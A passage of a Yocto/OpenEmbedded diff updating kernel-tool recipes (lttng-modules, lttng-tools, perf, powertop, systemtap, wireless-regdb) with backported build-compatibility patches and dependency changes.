+Change-Id: I0b7eb8aa78b5bd2039e20ae3e1da4c5eb9018789
+---
+ probes/Kbuild | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/probes/Kbuild b/probes/Kbuild
+index 58da82b8..87f2d681 100644
+--- a/probes/Kbuild
++++ b/probes/Kbuild
+@@ -217,7 +217,10 @@ endif
+
+ # Introduced in v3.6, remove in v5.18
+ obj-$(CONFIG_LTTNG) += $(shell \
+- if [ \( ! \( $(VERSION) -ge 6 -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -ge 18 \) \) \) \
++ if [ \( ! \( $(VERSION) -ge 6 \
++ -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -ge 18 \) \
++ -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -eq 15 -a $(SUBLEVEL) -ge 44 \) \
++ -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -eq 10 -a $(SUBLEVEL) -ge 119\) \) \) \
+ -a \
+ $(VERSION) -ge 4 \
+ -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -ge 6 \) \
+--
+2.35.1
+
diff --git a/meta/recipes-kernel/lttng/lttng-modules/0019-fix-random-tracepoints-removed-in-stable-kernels.patch b/meta/recipes-kernel/lttng/lttng-modules/0019-fix-random-tracepoints-removed-in-stable-kernels.patch
new file mode 100644
index 0000000000..73ba4d06bc
--- /dev/null
+++ b/meta/recipes-kernel/lttng/lttng-modules/0019-fix-random-tracepoints-removed-in-stable-kernels.patch
@@ -0,0 +1,51 @@
+From 2c98e0cd03eba0aa935796bc7413c51b5e4b055c Mon Sep 17 00:00:00 2001
+From: Michael Jeanson <mjeanson@efficios.com>
+Date: Tue, 31 May 2022 15:24:48 -0400
+Subject: [PATCH 19/19] fix: 'random' tracepoints removed in stable kernels
+
+The upstream commit 14c174633f349cb41ea90c2c0aaddac157012f74 removing
+the 'random' tracepoints is being backported to multiple stable kernel
+branches, I don't see how that qualifies as a fix but here we are.
+
+Use the presence of 'include/trace/events/random.h' in the kernel source
+tree instead of the rather tortuous version check to determine if we
+need to build 'lttng-probe-random.ko'.
+
+Upstream-Status: Backport [ed1149ef88fb62c365ac66cf62c58ac6abd8d7e8]
+Change-Id: I8f5f2f4c9e09c61127c49c7949b22dd3fab0460d
+Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
+Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
+---
+ probes/Kbuild | 16 ++++------------
+ 1 file changed, 4 insertions(+), 12 deletions(-)
+
+diff --git a/probes/Kbuild b/probes/Kbuild
+index 87f2d681..f09d6b65 100644
+--- a/probes/Kbuild
++++ b/probes/Kbuild
+@@ -216,18 +216,10 @@ ifneq ($(CONFIG_FRAME_WARN),0)
+ endif
+
+ # Introduced in v3.6, remove in v5.18
+-obj-$(CONFIG_LTTNG) += $(shell \
+- if [ \( ! \( $(VERSION) -ge 6 \
+- -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -ge 18 \) \
+- -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -eq 15 -a $(SUBLEVEL) -ge 44 \) \
+- -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -eq 10 -a $(SUBLEVEL) -ge 119\) \) \) \
+- -a \
+- $(VERSION) -ge 4 \
+- -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -ge 6 \) \
+- -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -eq 5 -a $(SUBLEVEL) -ge 2 \) \
+- -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -eq 4 -a $(SUBLEVEL) -ge 9 \) \
+- -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -eq 0 -a $(SUBLEVEL) -ge 41 \) ] ; then \
+- echo "lttng-probe-random.o" ; fi;)
++random_dep = $(srctree)/include/trace/events/random.h
++ifneq ($(wildcard $(random_dep)),)
++ obj-$(CONFIG_LTTNG) += lttng-probe-random.o
++endif
+
+ obj-$(CONFIG_LTTNG) += $(shell \
+ if [ $(VERSION) -ge 4 \
+--
+2.35.1
+
diff --git a/meta/recipes-kernel/lttng/lttng-modules/fix-jbd2-use-the-correct-print-format.patch b/meta/recipes-kernel/lttng/lttng-modules/fix-jbd2-use-the-correct-print-format.patch
new file mode 100644
index 0000000000..b4939188cc
--- /dev/null
+++ b/meta/recipes-kernel/lttng/lttng-modules/fix-jbd2-use-the-correct-print-format.patch
@@ -0,0 +1,147 @@
+fix: jbd2: use the correct print format
+See upstream commit :
+
+ commit d87a7b4c77a997d5388566dd511ca8e6b8e8a0a8
+ Author: Bixuan Cui <cuibixuan@linux.alibaba.com>
+ Date: Tue Oct 11 19:33:44 2022 +0800
+
+ jbd2: use the correct print format
+
+ The print format error was found when using ftrace event:
+ <...>-1406 [000] .... 23599442.895823: jbd2_end_commit: dev 252,8 transaction -1866216965 sync 0 head -1866217368
+ <...>-1406 [000] .... 23599442.896299: jbd2_start_commit: dev 252,8 transaction -1866216964 sync 0
+
+ Use the correct print format for transaction, head and tid.
+
+Change-Id: Ic053f0e0c1e24ebc75bae51d07696aaa5e1c0094
+Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
+Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
+
+Upstream-status: Backport
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+Note: combines three upstream commits:
+https://github.com/lttng/lttng-modules/commit/b28830a0dcdf95ec3e6b390b4d032667deaad0c0
+https://github.com/lttng/lttng-modules/commit/4fd2615b87b3cac0fd5bdc5fc82db05f6fcfdecf
+https://github.com/lttng/lttng-modules/commit/612c99eb24bf72f4d47d02025e92de8c35ece14e
+
+diff --git a/instrumentation/events/lttng-module/jbd2.h b/instrumentation/events/lttng-module/jbd2.h
+--- a/instrumentation/events/lttng-module/jbd2.h
++++ b/instrumentation/events/lttng-module/jbd2.h
+@@ -29,6 +29,25 @@ LTTNG_TRACEPOINT_EVENT(jbd2_checkpoint,
+ )
+ )
+
++#if (LTTNG_LINUX_VERSION_CODE >= LTTNG_KERNEL_VERSION(6,2,0) \
++ || LTTNG_KERNEL_RANGE(5,4,229, 5,5,0) \
++ || LTTNG_KERNEL_RANGE(5,10,163, 5,11,0) \
++ || LTTNG_KERNEL_RANGE(5,15,87, 5,16,0) \
++ || LTTNG_KERNEL_RANGE(6,0,18, 6,1,0) \
++ || LTTNG_KERNEL_RANGE(6,1,4, 6,2,0))
++LTTNG_TRACEPOINT_EVENT_CLASS(jbd2_commit,
++
++ TP_PROTO(journal_t *journal, transaction_t *commit_transaction),
++
++ TP_ARGS(journal, commit_transaction),
++
++ TP_FIELDS(
++ ctf_integer(dev_t, dev, journal->j_fs_dev->bd_dev)
++ ctf_integer(char, sync_commit, commit_transaction->t_synchronous_commit)
++ ctf_integer(tid_t, transaction, commit_transaction->t_tid)
++ )
++)
++#else
+ LTTNG_TRACEPOINT_EVENT_CLASS(jbd2_commit,
+
+ TP_PROTO(journal_t *journal, transaction_t *commit_transaction),
+@@ -41,6 +60,7 @@ LTTNG_TRACEPOINT_EVENT_CLASS(jbd2_commit
+ ctf_integer(int, transaction, commit_transaction->t_tid)
+ )
+ )
++#endif
+
+ LTTNG_TRACEPOINT_EVENT_INSTANCE(jbd2_commit, jbd2_start_commit,
+
+@@ -79,6 +99,25 @@ LTTNG_TRACEPOINT_EVENT_INSTANCE(jbd2_com
+ )
+ #endif
+
++#if (LTTNG_LINUX_VERSION_CODE >= LTTNG_KERNEL_VERSION(6,2,0) \
++ || LTTNG_KERNEL_RANGE(5,4,229, 5,5,0) \
++ || LTTNG_KERNEL_RANGE(5,10,163, 5,11,0) \
++ || LTTNG_KERNEL_RANGE(5,15,87, 5,16,0) \
++ || LTTNG_KERNEL_RANGE(6,0,18, 6,1,0) \
++ || LTTNG_KERNEL_RANGE(6,1,4, 6,2,0))
++LTTNG_TRACEPOINT_EVENT(jbd2_end_commit,
++ TP_PROTO(journal_t *journal, transaction_t *commit_transaction),
++
++ TP_ARGS(journal, commit_transaction),
++
++ TP_FIELDS(
++ ctf_integer(dev_t, dev, journal->j_fs_dev->bd_dev)
++ ctf_integer(char, sync_commit, commit_transaction->t_synchronous_commit)
++ ctf_integer(tid_t, transaction, commit_transaction->t_tid)
++ ctf_integer(tid_t, head, journal->j_tail_sequence)
++ )
++)
++#else
+ LTTNG_TRACEPOINT_EVENT(jbd2_end_commit,
+ TP_PROTO(journal_t *journal, transaction_t *commit_transaction),
+
+@@ -91,6 +130,7 @@ LTTNG_TRACEPOINT_EVENT(jbd2_end_commit,
+ ctf_integer(int, head, journal->j_tail_sequence)
+ )
+ )
++#endif
+
+ LTTNG_TRACEPOINT_EVENT(jbd2_submit_inode_data,
+ TP_PROTO(struct inode *inode),
+@@ -103,7 +143,48 @@ LTTNG_TRACEPOINT_EVENT(jbd2_submit_inode
+ )
+ )
+
+-#if (LTTNG_LINUX_VERSION_CODE >= LTTNG_KERNEL_VERSION(2,6,32))
++#if (LTTNG_LINUX_VERSION_CODE >= LTTNG_KERNEL_VERSION(6,2,0) \
++ || LTTNG_KERNEL_RANGE(5,4,229, 5,5,0) \
++ || LTTNG_KERNEL_RANGE(5,10,163, 5,11,0) \
++ || LTTNG_KERNEL_RANGE(5,15,87, 5,16,0) \
++ || LTTNG_KERNEL_RANGE(6,0,18, 6,1,0) \
++ || LTTNG_KERNEL_RANGE(6,1,4, 6,2,0))
++LTTNG_TRACEPOINT_EVENT(jbd2_run_stats,
++ TP_PROTO(dev_t dev, tid_t tid,
++ struct transaction_run_stats_s *stats),
++
++ TP_ARGS(dev, tid, stats),
++
++ TP_FIELDS(
++ ctf_integer(dev_t, dev, dev)
++ ctf_integer(tid_t, tid, tid)
++ ctf_integer(unsigned long, wait, stats->rs_wait)
++ ctf_integer(unsigned long, running, stats->rs_running)
++ ctf_integer(unsigned long, locked, stats->rs_locked)
++ ctf_integer(unsigned long, flushing, stats->rs_flushing)
++ ctf_integer(unsigned long, logging, stats->rs_logging)
++ ctf_integer(__u32, handle_count, stats->rs_handle_count)
++ ctf_integer(__u32, blocks, stats->rs_blocks)
++ ctf_integer(__u32, blocks_logged, stats->rs_blocks_logged)
++ )
++)
++
++LTTNG_TRACEPOINT_EVENT(jbd2_checkpoint_stats,
++ TP_PROTO(dev_t dev, tid_t tid,
++ struct transaction_chp_stats_s *stats),
++
++ TP_ARGS(dev, tid, stats),
++
++ TP_FIELDS(
++ ctf_integer(dev_t, dev, dev)
++ ctf_integer(tid_t, tid, tid)
++ ctf_integer(unsigned long, chp_time, stats->cs_chp_time)
++ ctf_integer(__u32, forced_to_close, stats->cs_forced_to_close)
++ ctf_integer(__u32, written, stats->cs_written)
++ ctf_integer(__u32, dropped, stats->cs_dropped)
++ )
++)
++#else
+ LTTNG_TRACEPOINT_EVENT(jbd2_run_stats,
+ TP_PROTO(dev_t dev, unsigned long tid,
+ struct transaction_run_stats_s *stats),
diff --git a/meta/recipes-kernel/lttng/lttng-modules_2.11.6.bb b/meta/recipes-kernel/lttng/lttng-modules_2.11.9.bb
index a38d8afb7a..8e9c44241b 100644
--- a/meta/recipes-kernel/lttng/lttng-modules_2.11.6.bb
+++ b/meta/recipes-kernel/lttng/lttng-modules_2.11.9.bb
@@ -1,6 +1,7 @@
SECTION = "devel"
SUMMARY = "Linux Trace Toolkit KERNEL MODULE"
DESCRIPTION = "The lttng-modules 2.0 package contains the kernel tracer modules"
+HOMEPAGE = "https://lttng.org/"
LICENSE = "LGPLv2.1 & GPLv2 & MIT"
LIC_FILES_CHKSUM = "file://LICENSE;md5=3f882d431dc0f32f1f44c0707aa41128"
@@ -11,10 +12,14 @@ COMPATIBLE_HOST = '(x86_64|i.86|powerpc|aarch64|mips|nios2|arm|riscv).*-linux'
SRC_URI = "https://lttng.org/files/${BPN}/${BPN}-${PV}.tar.bz2 \
file://Makefile-Do-not-fail-if-CONFIG_TRACEPOINTS-is-not-en.patch \
file://BUILD_RUNTIME_BUG_ON-vs-gcc7.patch \
+ file://0017-fix-random-remove-unused-tracepoints-v5.18.patch \
+ file://0018-fix-random-remove-unused-tracepoints-v5.10-v5.15.patch \
+ file://0019-fix-random-tracepoints-removed-in-stable-kernels.patch \
+ file://fix-jbd2-use-the-correct-print-format.patch \
"
-SRC_URI[md5sum] = "8ef09fdfcdec669d33f7fc1c1c80f2c4"
-SRC_URI[sha256sum] = "23372811cdcd2ac28ba8c9d09484ed5f9238cfbd0043f8c663ff3875ba9c8566"
+SRC_URI[md5sum] = "cfb23ea6bdaf1ad40c7f9ac098b4016d"
+SRC_URI[sha256sum] = "0c5fe9f8d8dbd1411a3c1c643dcbd0a55577bd15845758b73948e00bc7c387a6"
export INSTALL_MOD_DIR="kernel/lttng-modules"
@@ -22,7 +27,9 @@ EXTRA_OEMAKE += "KERNELDIR='${STAGING_KERNEL_DIR}'"
do_install_append() {
# Delete empty directories to avoid QA failures if no modules were built
- find ${D}/${nonarch_base_libdir} -depth -type d -empty -exec rmdir {} \;
+ if [ -d ${D}/${nonarch_base_libdir} ]; then
+ find ${D}/${nonarch_base_libdir} -depth -type d -empty -exec rmdir {} \;
+ fi
}
python do_package_prepend() {
diff --git a/meta/recipes-kernel/lttng/lttng-tools_2.11.5.bb b/meta/recipes-kernel/lttng/lttng-tools_2.11.5.bb
index a969fffd62..6306193809 100644
--- a/meta/recipes-kernel/lttng/lttng-tools_2.11.5.bb
+++ b/meta/recipes-kernel/lttng/lttng-tools_2.11.5.bb
@@ -3,13 +3,14 @@ SUMMARY = "Linux Trace Toolkit Control"
DESCRIPTION = "The Linux trace toolkit is a suite of tools designed \
to extract program execution details from the Linux operating system \
and interpret them."
+HOMEPAGE = "https://github.com/lttng/lttng-tools"
LICENSE = "GPLv2 & LGPLv2.1"
LIC_FILES_CHKSUM = "file://LICENSE;md5=01d7fc4496aacf37d90df90b90b0cac1 \
file://gpl-2.0.txt;md5=b234ee4d69f5fce4486a80fdaf4a4263 \
file://lgpl-2.1.txt;md5=0f0d71500e6a57fd24d825f33242b9ca"
-DEPENDS = "liburcu popt libxml2 util-linux"
+DEPENDS = "liburcu popt libxml2 util-linux bison-native"
RDEPENDS_${PN} = "libgcc"
RDEPENDS_${PN}-ptest += "make perl bash gawk babeltrace procps perl-module-overloading coreutils util-linux kmod lttng-modules sed python3-core"
RDEPENDS_${PN}-ptest_append_libc-glibc = " glibc-utils"
diff --git a/meta/recipes-kernel/make-mod-scripts/make-mod-scripts_1.0.bb b/meta/recipes-kernel/make-mod-scripts/make-mod-scripts_1.0.bb
index c7edb20ee4..32b89bb5ea 100644
--- a/meta/recipes-kernel/make-mod-scripts/make-mod-scripts_1.0.bb
+++ b/meta/recipes-kernel/make-mod-scripts/make-mod-scripts_1.0.bb
@@ -1,8 +1,9 @@
SUMMARY = "Build tools needed by external modules"
+HOMEPAGE = "https://www.yoctoproject.org/"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://${COREBASE}/meta/files/common-licenses/GPL-2.0;md5=801f80980d171dd6425610833a22dbe6"
-inherit kernel-arch
+inherit kernel-arch linux-kernel-base
inherit pkgconfig
PACKAGE_ARCH = "${MACHINE_ARCH}"
@@ -15,8 +16,10 @@ do_compile[depends] += "virtual/kernel:do_compile_kernelmodules"
RDEPENDS_${PN}-dev = ""
DEPENDS += "bc-native bison-native"
+DEPENDS += "gmp-native"
EXTRA_OEMAKE = " HOSTCC="${BUILD_CC} ${BUILD_CFLAGS} ${BUILD_LDFLAGS}" HOSTCPP="${BUILD_CPP}""
+EXTRA_OEMAKE += " HOSTCXX="${BUILD_CXX} ${BUILD_CXXFLAGS} ${BUILD_LDFLAGS}" CROSS_COMPILE=${TARGET_PREFIX}"
# Build some host tools under work-shared. CC, LD, and AR are probably
# not used, but this is the historical way of invoking "make scripts".
diff --git a/meta/recipes-kernel/modutils-initscripts/files/modutils.sh b/meta/recipes-kernel/modutils-initscripts/files/modutils.sh
index a78adf5729..df37bfe7a1 100755
--- a/meta/recipes-kernel/modutils-initscripts/files/modutils.sh
+++ b/meta/recipes-kernel/modutils-initscripts/files/modutils.sh
@@ -18,7 +18,7 @@ LOAD_MODULE=modprobe
if [ ! -f /lib/modules/`uname -r`/modules.dep ]; then
[ "$VERBOSE" != no ] && echo "Calculating module dependencies ..."
- depmod -Ae
+ depmod -a
fi
loaded_modules=" "
diff --git a/meta/recipes-kernel/perf/perf.bb b/meta/recipes-kernel/perf/perf.bb
index 578b871e9e..42621e47d3 100644
--- a/meta/recipes-kernel/perf/perf.bb
+++ b/meta/recipes-kernel/perf/perf.bb
@@ -9,11 +9,11 @@ HOMEPAGE = "https://perf.wiki.kernel.org/index.php/Main_Page"
LICENSE = "GPLv2"
-PR = "r9"
+PR = "r10"
PACKAGECONFIG ??= "scripting tui libunwind"
PACKAGECONFIG[dwarf] = ",NO_DWARF=1"
-PACKAGECONFIG[scripting] = ",NO_LIBPERL=1 NO_LIBPYTHON=1,perl python3"
+PACKAGECONFIG[scripting] = ",NO_LIBPERL=1 NO_LIBPYTHON=1,perl python3 python3-setuptools-native"
# gui support was added with kernel 3.6.35
# since 3.10 libnewt was replaced by slang
# to cover a wide range of kernel we add both dependencies
@@ -45,7 +45,7 @@ PROVIDES = "virtual/perf"
inherit linux-kernel-base kernel-arch manpages
# needed for building the tools/perf Python bindings
-inherit ${@bb.utils.contains('PACKAGECONFIG', 'scripting', 'python3native', '', d)}
+inherit ${@bb.utils.contains('PACKAGECONFIG', 'scripting', 'python3targetconfig', '', d)}
inherit python3-dir
export PYTHON_SITEPACKAGES_DIR
@@ -265,9 +265,9 @@ PACKAGES =+ "${PN}-archive ${PN}-tests ${PN}-perl ${PN}-python"
RDEPENDS_${PN} += "elfutils bash"
RDEPENDS_${PN}-archive =+ "bash"
-RDEPENDS_${PN}-python =+ "bash python3 python3-modules ${@bb.utils.contains('PACKAGECONFIG', 'audit', 'audit-python3', '', d)}"
+RDEPENDS_${PN}-python =+ "bash python3 python3-modules ${@bb.utils.contains('PACKAGECONFIG', 'audit', 'audit-python', '', d)}"
RDEPENDS_${PN}-perl =+ "bash perl perl-modules"
-RDEPENDS_${PN}-tests =+ "python3"
+RDEPENDS_${PN}-tests =+ "python3 bash"
RSUGGESTS_SCRIPTING = "${@bb.utils.contains('PACKAGECONFIG', 'scripting', '${PN}-perl ${PN}-python', '',d)}"
RSUGGESTS_${PN} += "${PN}-archive ${PN}-tests ${RSUGGESTS_SCRIPTING}"
diff --git a/meta/recipes-kernel/powertop/powertop/0002-configure.ac-ax_add_fortify_source.patch b/meta/recipes-kernel/powertop/powertop/0002-configure.ac-ax_add_fortify_source.patch
new file mode 100644
index 0000000000..4ccbdbfcd1
--- /dev/null
+++ b/meta/recipes-kernel/powertop/powertop/0002-configure.ac-ax_add_fortify_source.patch
@@ -0,0 +1,70 @@
+From 0d833743954ac1c58773cbf7a78fe0dc8105ae4a Mon Sep 17 00:00:00 2001
+From: Joe Konno <joe.konno@linux.intel.com>
+Date: Tue, 11 Feb 2020 14:15:42 -0800
+Subject: [PATCH] configure.ac: ax_add_fortify_source
+
+Use a maintained autoconf-archive macro to determine whether we need to
+add -D_FORTIFY_SOURCE=2, or if the underlying OS (or toolchain) has it
+baked in.
+
+Signed-off-by: Joe Konno <joe.konno@intel.com>
+
+Fixes:
+ aclocal: error: too many loops
+
+Upstream-Status: Backport from 2.12
+Signed-off-by: Tim Orling <timothy.t.orling@intel.com>
+---
+ configure.ac | 2 +-
+ m4/gcc_fortify_source_cc.m4 | 29 -----------------------------
+ 2 files changed, 1 insertion(+), 30 deletions(-)
+ delete mode 100644 m4/gcc_fortify_source_cc.m4
+
+diff --git a/configure.ac b/configure.ac
+index d6a15e1..d68369c 100644
+--- a/configure.ac
++++ b/configure.ac
+@@ -36,7 +36,7 @@ AC_PROG_LIBTOOL
+ AC_PROG_CC
+ AC_PROG_INSTALL
+ AM_PROG_CC_C_O
+-GCC_FORTIFY_SOURCE_CC
++AX_ADD_FORTIFY_SOURCE
+ AX_CXX_COMPILE_STDCXX_11([noext], [mandatory])
+
+ # Checks for libraries.
+diff --git a/m4/gcc_fortify_source_cc.m4 b/m4/gcc_fortify_source_cc.m4
+deleted file mode 100644
+index 1206672..0000000
+--- a/m4/gcc_fortify_source_cc.m4
++++ /dev/null
+@@ -1,29 +0,0 @@
+-dnl GCC_FORTIFY_SOURCE_CC
+-dnl checks -D_FORTIFY_SOURCE with the C++ compiler, if it exists then
+-dnl updates CXXCPP
+-AC_DEFUN([GCC_FORTIFY_SOURCE_CC],[
+- AC_LANG_ASSERT([C++])
+- AS_IF([test "X$CXX" != "X"], [
+- AC_MSG_CHECKING([for FORTIFY_SOURCE support])
+- fs_old_cxxcpp="$CXXCPP"
+- fs_old_cxxflags="$CXXFLAGS"
+- CXXCPP="$CXXCPP -D_FORTIFY_SOURCE=2"
+- CXXFLAGS="$CXXFLAGS -Werror"
+- AC_COMPILE_IFELSE([
+- AC_LANG_PROGRAM([[]], [[
+- int main(void) {
+- #if !(__GNUC_PREREQ (4, 1) )
+- #error No FORTIFY_SOURCE support
+- #endif
+- return 0;
+- }
+- ]], [
+- AC_MSG_RESULT([yes])
+- ], [
+- AC_MSG_RESULT([no])
+- CXXCPP="$fs_old_cxxcpp"
+- ])
+- ])
+- CXXFLAGS="$fs_old_cxxflags"
+- ])
+-])
diff --git a/meta/recipes-kernel/powertop/powertop/0003-configure-Use-AX_REQUIRE_DEFINED.patch b/meta/recipes-kernel/powertop/powertop/0003-configure-Use-AX_REQUIRE_DEFINED.patch
new file mode 100644
index 0000000000..ac728f4a39
--- /dev/null
+++ b/meta/recipes-kernel/powertop/powertop/0003-configure-Use-AX_REQUIRE_DEFINED.patch
@@ -0,0 +1,29 @@
+From fbf74492236676e844b021b0dbb45b1ca43a0410 Mon Sep 17 00:00:00 2001
+From: David King <amigadave@amigadave.com>
+Date: Thu, 15 Apr 2021 11:45:13 +0100
+Subject: [PATCH] configure: Use AX_REQUIRE_DEFINED
+
+Require additional macros to be defined early, to avoid an aclocal
+"too many loops" error when copying macros.
+
+Upstream-Status: Backport from tip
+
+Signed-off-by: Tim Orling <ticotimo@gmail.com>
+---
+ configure.ac | 3 +++
+ 1 file changed, 3 insertions(+)
+
+diff --git a/configure.ac b/configure.ac
+index d68369c..b90831b 100644
+--- a/configure.ac
++++ b/configure.ac
+@@ -29,6 +29,9 @@ AM_GNU_GETTEXT([external])
+ AM_GNU_GETTEXT_VERSION([0.18.2])
+
+ m4_ifdef([AM_PROG_AR], [AM_PROG_AR])
++AX_REQUIRE_DEFINED([AX_ADD_FORTIFY_SOURCE])
++AX_REQUIRE_DEFINED([AX_CXX_COMPILE_STDCXX])
++AX_REQUIRE_DEFINED([AX_PTHREAD])
+ # Checks for programs.
+ AC_PROG_CPP
+ AC_PROG_CXX
diff --git a/meta/recipes-kernel/powertop/powertop_2.10.bb b/meta/recipes-kernel/powertop/powertop_2.10.bb
index f1b0e92b2b..dcbba2fd5c 100644
--- a/meta/recipes-kernel/powertop/powertop_2.10.bb
+++ b/meta/recipes-kernel/powertop/powertop_2.10.bb
@@ -2,13 +2,15 @@ SUMMARY = "Power usage tool"
DESCRIPTION = "Linux tool to diagnose issues with power consumption and power management."
HOMEPAGE = "https://01.org/powertop/"
BUGTRACKER = "https://app.devzing.com/powertopbugs/bugzilla"
-DEPENDS = "ncurses libnl pciutils"
+DEPENDS = "ncurses libnl pciutils autoconf-archive"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e"
-SRC_URI = "git://github.com/fenrus75/powertop;protocol=https \
- file://0001-wakeup_xxx.h-include-limits.h.patch \
-"
+SRC_URI = "git://github.com/fenrus75/powertop;protocol=https;branch=master \
+ file://0001-wakeup_xxx.h-include-limits.h.patch \
+ file://0002-configure.ac-ax_add_fortify_source.patch \
+ file://0003-configure-Use-AX_REQUIRE_DEFINED.patch \
+ "
SRCREV = "e8765b5475b22b7a2b6e9e8a031c68a268a0b0b3"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-kernel/systemtap/systemtap-uprobes_git.bb b/meta/recipes-kernel/systemtap/systemtap-uprobes_git.bb
index 46820ef489..6ee0be5e3e 100644
--- a/meta/recipes-kernel/systemtap/systemtap-uprobes_git.bb
+++ b/meta/recipes-kernel/systemtap/systemtap-uprobes_git.bb
@@ -1,5 +1,5 @@
SUMMARY = "UProbes kernel module for SystemTap"
-
+HOMEPAGE = "https://sourceware.org/systemtap/"
require systemtap_git.inc
DEPENDS = "systemtap virtual/kernel"
diff --git a/meta/recipes-kernel/systemtap/systemtap/0001-gcc12-c-compatibility-re-tweak-for-rhel6-use-functio.patch b/meta/recipes-kernel/systemtap/systemtap/0001-gcc12-c-compatibility-re-tweak-for-rhel6-use-functio.patch
new file mode 100644
index 0000000000..f885c44460
--- /dev/null
+++ b/meta/recipes-kernel/systemtap/systemtap/0001-gcc12-c-compatibility-re-tweak-for-rhel6-use-functio.patch
@@ -0,0 +1,49 @@
+From f199d1982ef8a6c6d5c06c082d057b8793bcc6aa Mon Sep 17 00:00:00 2001
+From: Serhei Makarov <serhei@serhei.io>
+Date: Fri, 21 Jan 2022 18:21:46 -0500
+Subject: [PATCH] gcc12 c++ compatibility re-tweak for rhel6: use function
+ pointer instead of lambdas instead of ptr_fun<>
+
+Saving 2 lines in ltrim/rtrim is probably not a good reason to drop
+compatibility with the RHEL6 system compiler. Actually declaring a
+named function and passing the function pointer is compatible with
+everything.
+
+Upstream-Status: Backport [https://sourceware.org/git/?p=systemtap.git;a=commit;h=f199d1982ef8a6c6d5c06c082d057b8793bcc6aa]
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+---
+ util.cxx | 13 ++++++++-----
+ 1 file changed, 8 insertions(+), 5 deletions(-)
+
+--- a/util.cxx
++++ b/util.cxx
+@@ -1757,21 +1757,24 @@ flush_to_stream (const string &fname, os
+ return 1; // Failure
+ }
+
++int
++not_isspace(unsigned char c)
++{
++ return !std::isspace(c);
++}
++
+ // trim from start (in place)
+ void
+ ltrim(std::string &s)
+ {
+- s.erase(s.begin(),
+- std::find_if(s.begin(), s.end(),
+- std::not1(std::ptr_fun<int, int>(std::isspace))));
++ s.erase(s.begin(), std::find_if(s.begin(), s.end(), not_isspace));
+ }
+
+ // trim from end (in place)
+ void
+ rtrim(std::string &s)
+ {
+- s.erase(std::find_if(s.rbegin(), s.rend(),
+- std::not1(std::ptr_fun<int, int>(std::isspace))).base(), s.end());
++ s.erase(std::find_if(s.rbegin(), s.rend(), not_isspace).base(), s.end());
+ }
+
+ // trim from both ends (in place)
diff --git a/meta/recipes-kernel/systemtap/systemtap_git.bb b/meta/recipes-kernel/systemtap/systemtap_git.bb
index 1c9f2aed16..a8b2cf1eac 100644
--- a/meta/recipes-kernel/systemtap/systemtap_git.bb
+++ b/meta/recipes-kernel/systemtap/systemtap_git.bb
@@ -1,9 +1,14 @@
SUMMARY = "Script-directed dynamic tracing and performance analysis tool for Linux"
+DESCRIPTION = "It provides free software infrastructure to simplify the \
+gathering of information about the running Linux system. This assists \
+diagnosis of a performance or functional problem."
HOMEPAGE = "https://sourceware.org/systemtap/"
require systemtap_git.inc
-SRC_URI += "file://0001-improve-reproducibility-for-c-compiling.patch"
+SRC_URI += "file://0001-improve-reproducibility-for-c-compiling.patch \
+ file://0001-gcc12-c-compatibility-re-tweak-for-rhel6-use-functio.patch \
+ "
DEPENDS = "elfutils"
diff --git a/meta/recipes-kernel/systemtap/systemtap_git.inc b/meta/recipes-kernel/systemtap/systemtap_git.inc
index 116e83fe0f..af55f15fd4 100644
--- a/meta/recipes-kernel/systemtap/systemtap_git.inc
+++ b/meta/recipes-kernel/systemtap/systemtap_git.inc
@@ -3,7 +3,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
SRCREV = "044a0640985ef007c0b2fb6eaf660d9d51800cda"
PV = "4.2"
-SRC_URI = "git://sourceware.org/git/systemtap.git \
+SRC_URI = "git://sourceware.org/git/systemtap.git;branch=master \
file://0001-Do-not-let-configure-write-a-python-location-into-th.patch \
file://0001-Install-python-modules-to-correct-library-dir.patch \
file://0001-staprun-stapbpf-don-t-support-installing-a-non-root.patch \
diff --git a/meta/recipes-kernel/wireless-regdb/wireless-regdb_2020.04.29.bb b/meta/recipes-kernel/wireless-regdb/wireless-regdb_2024.01.23.bb
index 30d4cb523f..6489bc90d9 100644
--- a/meta/recipes-kernel/wireless-regdb/wireless-regdb_2020.04.29.bb
+++ b/meta/recipes-kernel/wireless-regdb/wireless-regdb_2024.01.23.bb
@@ -5,7 +5,7 @@ LICENSE = "ISC"
LIC_FILES_CHKSUM = "file://LICENSE;md5=07c4f6dea3845b02a18dc00c8c87699c"
SRC_URI = "https://www.kernel.org/pub/software/network/${BPN}/${BP}.tar.xz"
-SRC_URI[sha256sum] = "89fd031aed5977c219a71501e144375a10e7c90d1005d5d086ea7972886a2c7a"
+SRC_URI[sha256sum] = "c8a61c9acf76fa7eb4239e89f640dee3e87098d9f69b4d3518c9c60fc6d20c55"
inherit bin_package allarch
@@ -13,7 +13,7 @@ do_install() {
install -d -m0755 ${D}${nonarch_libdir}/crda
install -d -m0755 ${D}${sysconfdir}/wireless-regdb/pubkeys
install -m 0644 regulatory.bin ${D}${nonarch_libdir}/crda/regulatory.bin
- install -m 0644 sforshee.key.pub.pem ${D}${sysconfdir}/wireless-regdb/pubkeys/sforshee.key.pub.pem
+ install -m 0644 wens.key.pub.pem ${D}${sysconfdir}/wireless-regdb/pubkeys/wens.key.pub.pem
